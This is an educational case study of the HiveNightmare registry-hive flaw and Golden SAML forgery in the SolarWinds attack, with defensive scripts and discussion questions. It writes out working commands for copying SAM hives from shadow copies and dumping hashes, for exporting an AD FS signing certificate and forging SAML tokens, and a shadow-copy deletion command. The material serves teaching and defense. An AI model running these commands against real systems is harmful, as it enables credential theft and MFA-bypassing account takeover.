Case Study 2: HiveNightmare/SeriousSAM and Golden SAML in the SolarWinds Attack

Local Privilege Meets Global Compromise


Part I: HiveNightmare (CVE-2021-36934) --- Reading the Keys to the Kingdom

Overview

In July 2021, security researcher Jonas Lykkegaard discovered that Windows 10 and Windows 11 systems had incorrect Access Control Lists (ACLs) on the SAM, SYSTEM, and SECURITY registry hive files. This misconfiguration, dubbed HiveNightmare (also known as SeriousSAM), allowed any standard user to read these critical security databases---which contain local password hashes, cached domain credentials, and other sensitive security information.

The Vulnerability

The SAM (Security Account Manager), SYSTEM, and SECURITY registry hives are among the most sensitive files on a Windows system. The SAM contains password hashes for all local user accounts. The SYSTEM hive contains the encryption key needed to decrypt the SAM hashes. Together, they provide everything needed to extract local administrator password hashes.

Normally, these files are locked by the operating system and only accessible to SYSTEM. However, HiveNightmare revealed that Windows had been setting overly permissive ACLs on these files since Windows 10 version 1809 (October 2018 Update). The BUILTIN\Users group had read access to the registry hive files.

Direct access to the live hive files was still blocked by the operating system's file locking. However, Windows' Volume Shadow Copy Service (VSS) creates periodic backup snapshots of the system volume. These shadow copies contained the registry hives with the same permissive ACLs---and shadow copies are not locked.

Exploitation

# Step 1: Verify the vulnerability
# Check if standard users can read the SAM
icacls C:\Windows\System32\config\SAM
# Vulnerable output shows: BUILTIN\Users:(I)(RX)

# Step 2: List available shadow copies
vssadmin list shadows

# Step 3: Read SAM and SYSTEM from a shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\temp\SECURITY

# Step 4: Extract hashes on attacker machine
python3 secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

# Output:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

The dedicated HiveNightmare.exe tool automated this process:

# Using the dedicated exploit tool
HiveNightmare.exe
# Automatically finds shadow copies and extracts SAM, SYSTEM, SECURITY

Impact on MedSecure

During the MedSecure engagement, HiveNightmare was exploited on a Windows 10 workstation to extract the local administrator password hash. Because MedSecure had not implemented LAPS (Local Administrator Password Solution), the same local admin password was used across all workstations. The extracted hash provided local administrator access to every Windows 10 machine in the organization.

Microsoft's Response

Microsoft released patches in the July 2021 Cumulative Update that corrected the ACLs on the registry hive files. However, existing shadow copies retained the vulnerable ACLs until they were deleted. Microsoft recommended:

  1. Apply the security update
  2. Delete all existing shadow copies: vssadmin delete shadows /all /quiet
  3. Create a new restore point

Part II: Golden SAML and the SolarWinds Attack

The SolarWinds Supply Chain Attack

The SolarWinds attack, discovered in December 2020, was one of the most sophisticated and consequential cyberattacks in history. The Russian foreign intelligence service (SVR, also known as APT29/Cozy Bear) compromised SolarWinds' Orion IT monitoring software build process, inserting a backdoor (SUNBURST) that was distributed to approximately 18,000 organizations through legitimate software updates. Among the victims were multiple U.S. government agencies, major technology companies, and critical infrastructure operators.

The Privilege Escalation Chain

The SolarWinds attack demonstrated a masterful privilege escalation chain that spanned from initial software compromise to complete domain dominance:

  1. Initial Access: SUNBURST backdoor in Orion software (supply chain compromise)
  2. Reconnaissance: SUNBURST performed extensive enumeration, lying dormant for up to two weeks to avoid detection
  3. Lateral Movement: Leveraged Orion's legitimate network access (it monitors infrastructure, so it connects to everything)
  4. Domain Compromise: Achieved domain administrator access through multiple techniques including Kerberoasting and credential dumping
  5. Golden SAML: The ultimate persistence mechanism

What Is Golden SAML?

Golden SAML is a persistence and lateral movement technique that exploits the trust relationship between an identity provider (IdP) and service providers (SPs) in a federated authentication environment. Most enterprises use Active Directory Federation Services (AD FS) as their IdP, which authenticates users and issues SAML (Security Assertion Markup Language) tokens that grant access to cloud services like Microsoft 365, AWS, Salesforce, and others.

The AD FS server signs SAML tokens with the private key of its token-signing certificate. If an attacker obtains that key, they can forge SAML tokens for any user to any federated service, bypassing multi-factor authentication, conditional access policies, and every other control enforced at the service provider, because all of those are evaluated before the token is issued and the service provider only checks the signature.

The SolarWinds Golden SAML Attack

The APT29 attackers:

  1. Compromised the AD FS server using their domain administrator access
  2. Extracted the token-signing certificate from the AD FS database
  3. Forged SAML tokens impersonating high-privilege users
  4. Accessed cloud email, documents, and applications for targeted users---including security and IT staff whose emails would reveal the organization's response to the breach

The forged tokens were indistinguishable from legitimate tokens because they were signed with the real signing key. No cloud-side check of the token itself could detect them. Multi-factor authentication was bypassed because a SAML token is issued only after authentication has already taken place, so the attacker never needed to authenticate at all.

Technical Execution

# Step 1: Extract AD FS signing certificate
# From the AD FS server (requires admin access):
# The certificate is in the AD FS configuration database
# or can be exported using Mimikatz/ADFSDump

# Using AADInternals (PowerShell)
Export-AADIntADFSSigningCertificate

# Using ADFSDump
ADFSDump.exe /domain:medsecure.local

# Step 2: Forge SAML token
# Using AADInternals
$token = New-AADIntSAMLToken -ImmutableId "USER_IMMUTABLE_ID" `
  -Issuer "http://medsecure.local/adfs/services/trust/" `
  -PfxFileName "adfs_cert.pfx" `
  -PfxPassword "password"

# Step 3: Use forged token to access Microsoft 365
# The token bypasses MFA and all cloud-side access controls
Open-AADIntOffice365Portal -SAMLToken $token

Connecting to Windows Privilege Escalation

Golden SAML illustrates why Windows privilege escalation matters far beyond the individual system. The attack chain that led to Golden SAML relied on:

  1. Initial compromise of a single server (via supply chain attack)
  2. Local privilege escalation to gain administrative access on compromised hosts
  3. Credential harvesting (SeDebugPrivilege to dump LSASS, HiveNightmare-style SAM extraction)
  4. Lateral movement using extracted credentials
  5. Domain compromise giving access to the AD FS server
  6. Golden SAML for cloud persistence

Without the ability to escalate privileges on individual Windows systems, the entire attack chain would have stalled at step 2.

🔵 Blue Team Perspective

HiveNightmare Defenses

  • Patch immediately and delete existing shadow copies
  • Implement LAPS to ensure unique local admin passwords
  • Monitor for shadow copy access patterns (Event ID 8222)
  • Regular ACL audits on sensitive system files
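As an added example (not part of the original case study), the following Python audit parses icacls output for the three hive files and flags any principal outside a trusted allow-list that holds a read-capable right. The icacls text is constructed, and the allow-list is an assumption to adjust to your own baseline.

```python
import re

# Principals expected to hold rights on SAM, SYSTEM and SECURITY on a default
# install.  Assumption: extend this allow-list to match your own baseline.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}

# icacls rights that allow reading file contents: the simple rights F, M, RX, R
# and the specific right RD.  I, OI, CI, IO and NP are inheritance flags only.
READ_RIGHTS = {"F", "M", "RX", "R", "RD"}

def parse_icacls(text):
    """Return {path: [(principal, flags, is_deny), ...]} from icacls output.
    A file's first ACE shares a line with its path; later ACEs are indented."""
    acls, path = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        head, _, rest = line.partition(" ")
        if ":\\" in head:                         # line starts with a drive path
            path, line = head, rest.strip()
        if path is None or ":(" not in line:      # blank or summary line
            continue
        principal, _, flag_text = line.rpartition(":")
        flags = {f for grp in re.findall(r"\(([^)]*)\)", flag_text)
                 for f in grp.split(",")}
        acls.setdefault(path, []).append((principal, flags, "DENY" in flags))
    return acls

def audit_hive_acls(text, trusted=TRUSTED):
    """Per hive file, list untrusted principals whose allow ACE grants read."""
    return {path: [p for p, flags, deny in aces
                   if not deny and p not in trusted and flags & READ_RIGHTS]
            for path, aces in parse_icacls(text).items()}

# Constructed icacls output: SAM still carries the vulnerable inherited
# BUILTIN\Users:(I)(RX) entry from the exploit step; SYSTEM is already fixed.
SAMPLE_ICACLS = r"""
C:\Windows\System32\config\SAM NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
C:\Windows\System32\config\SYSTEM NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)

Successfully processed 2 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, exposed in audit_hive_acls(SAMPLE_ICACLS).items():
        print("VULNERABLE" if exposed else "ok        ", path, ", ".join(exposed))
```

Feed it the output of `icacls C:\Windows\System32\config\*` from the live volume and from each shadow copy path, since the page notes that shadow copies keep the old ACLs after patching.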

Golden SAML Defenses

  • Treat the AD FS server as a Tier 0 asset (same protection as domain controllers)
  • Rotate the AD FS token-signing certificate regularly
  • Monitor AD FS authentication logs for anomalous token issuance
  • Implement Conditional Access policies with device compliance
  • Use Azure AD Continuous Access Evaluation
  • Deploy Microsoft Defender for Identity on AD FS servers
  • Restrict access to the AD FS server to the absolute minimum number of administrators
  • Consider moving authentication into Azure AD itself (cloud-managed authentication instead of federation) to eliminate on-premises AD FS

Detecting Golden SAML

  • Monitor for SAML tokens with unusual attributes (impossible travel, unusual user agents)
  • Compare token issuance logs on AD FS with authentication events at service providers
  • Alert on SAML token usage outside normal business hours or from unexpected locations
  • Implement token binding where supported
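The second detection bullet above, worked through as an added example that is not part of the original case study or of any vendor tooling: AD FS Event ID 1200 ("The Federation Service issued a valid token") records are correlated with Azure AD sign-in records, and any federated sign-in with no issuance for that user inside the token lifetime is flagged. The records are constructed with simplified field names, and the 65-minute window is an assumption (default one-hour token lifetime plus clock skew).

```python
from datetime import datetime, timedelta

# A SAML token issued by AD FS is redeemed at the service provider within its
# lifetime, so every federated cloud sign-in should be preceded by an AD FS
# Event ID 1200 for that user.  A sign-in with no such event is the signature
# of a token signed outside AD FS.  Assumption: 60 min lifetime + 5 min skew.
MAX_TOKEN_AGE = timedelta(minutes=65)

def _ts(value):                              # "2020-12-14T09:00:00Z" -> datetime
    return datetime.fromisoformat(value.replace("Z", "+00:00"))

def find_unissued_federated_signins(adfs_events, cloud_signins, max_age=MAX_TOKEN_AGE):
    """Return the cloud sign-ins that used a federated (AD FS) token although
    AD FS logged no matching issuance for that user inside the window."""
    issued = {}                              # upn (lower-case) -> [issue times]
    for ev in adfs_events:
        if ev["EventId"] == 1200:
            issued.setdefault(ev["UserId"].lower(), []).append(_ts(ev["TimeCreated"]))
    suspicious = []
    for s in cloud_signins:
        if s["tokenIssuerType"] != "ADFederationServices":
            continue                         # cloud-native sign-in, AD FS not involved
        used = _ts(s["createdDateTime"])
        times = issued.get(s["userPrincipalName"].lower(), [])
        if not any(used - max_age <= t <= used for t in times):
            suspicious.append(s)
    return suspicious

# Constructed sample records (field names simplified from the AD FS Admin log
# and the Azure AD sign-in log).  alice is a normal federated login; bob's and
# dave's tokens were never issued by AD FS within the window; carol signed in
# with cloud-native authentication and is out of scope.
ADFS_EVENTS = [
    {"EventId": 1200, "TimeCreated": "2020-12-14T09:00:10Z", "UserId": "alice@medsecure.local"},
    {"EventId": 1200, "TimeCreated": "2020-12-14T06:00:00Z", "UserId": "dave@medsecure.local"},
]
CLOUD_SIGNINS = [
    {"createdDateTime": "2020-12-14T09:00:42Z", "userPrincipalName": "alice@medsecure.local",
     "tokenIssuerType": "ADFederationServices", "ipAddress": "203.0.113.10"},
    {"createdDateTime": "2020-12-14T03:14:07Z", "userPrincipalName": "bob@medsecure.local",
     "tokenIssuerType": "ADFederationServices", "ipAddress": "198.51.100.77"},
    {"createdDateTime": "2020-12-14T09:30:00Z", "userPrincipalName": "dave@medsecure.local",
     "tokenIssuerType": "ADFederationServices", "ipAddress": "198.51.100.78"},
    {"createdDateTime": "2020-12-14T10:05:00Z", "userPrincipalName": "carol@medsecure.local",
     "tokenIssuerType": "AzureAD", "ipAddress": "203.0.113.11"},
]

if __name__ == "__main__":
    for s in find_unissued_federated_signins(ADFS_EVENTS, CLOUD_SIGNINS):
        print("no AD FS issuance:", s["userPrincipalName"], s["createdDateTime"], s["ipAddress"])
```

The check only works if AD FS auditing is enabled and the 1200 events are shipped off the AD FS server before a Tier 0 attacker can clear them.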

Discussion Questions

  1. HiveNightmare resulted from incorrect ACLs that had been present since Windows 10 version 1809 (2018). How did this go undetected for nearly three years despite active security research on Windows?
  2. The SolarWinds attackers chose Golden SAML for persistence over more traditional techniques (Golden Ticket, scheduled tasks, etc.). Why was this strategically superior?
  3. How does the SolarWinds attack chain illustrate the concept of "identity is the new perimeter"?
  4. If MedSecure had implemented LAPS before the engagement, how would the HiveNightmare finding's impact have differed?
  5. What organizational structures and processes could have prevented the SolarWinds supply chain compromise from reaching domain administrator level?

References

  • CVE-2021-36934 (HiveNightmare/SeriousSAM) NVD Entry
  • Jonas Lykkegaard (@jonasLyk): Original disclosure thread
  • CyberArk: "Golden SAML: Newly Discovered Attack Technique Forges Authentication" (2017)
  • Microsoft: "Analyzing Solorigate: The Compromised DLL File That Started It Out"
  • CISA: Alert AA21-008A "Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments"
  • FireEye/Mandiant: "Highly Evasive Attacker Leverages SolarWinds Supply Chain" (December 2020)
  • Sygnia: "Golden SAML Technical Analysis"